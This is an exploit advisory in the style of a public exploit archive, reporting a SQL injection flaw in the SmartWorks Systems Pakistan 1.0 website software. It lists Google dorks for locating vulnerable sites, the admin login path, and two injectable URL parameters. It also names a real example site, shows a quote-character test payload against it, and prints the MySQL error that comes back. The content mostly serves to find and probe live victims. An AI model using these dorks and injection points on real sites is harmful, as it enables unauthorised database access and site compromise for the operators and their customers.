###########################################################################

# Exploit Title : SmartWorks Systems Pakistan 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : smartworks.pk
# Tested On : Windows
# Exploit Risk : Medium
# Category : WebApps
# Version Information : Nginx 1.14.1 - jQuery 1.11.1 - jQuery UI 1.10.4
# CWE : CWE-89 [ Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection') ]
# CXSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050284

###########################################################################

Packaging Printing A(c) 2012 Powered by SmartWorks Systems Pakistan SQL
Injection Vulnerability

###########################################################################

# Google Dork :  intext:''Packaging Printing A(c) 2012. Powered by :
SmartWorks Systems.''

# Google Dork :  intext:''Copyright 2018, All rights reserved, Designed by
Smartworks Systems''

# Admin Control Panel Login Path => /admin/login.php

# Exploit : /aboutus.php?id=[SQL Injection]

# Exploit : /services.php?content=services&sid=[SQL Injection]

###########################################################################

# Example Site =>

pakistanpackages.com/services.php?content=services&sid=75%27 =>

[ Proof of Concept for SQL Injection ] => archive.is/qlHcQ

# SQL/DB Error : You have an error in your SQL syntax; check the manual
that corresponds

to your MySQL server version for the right syntax to use near ''' at line 1

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###########################################################################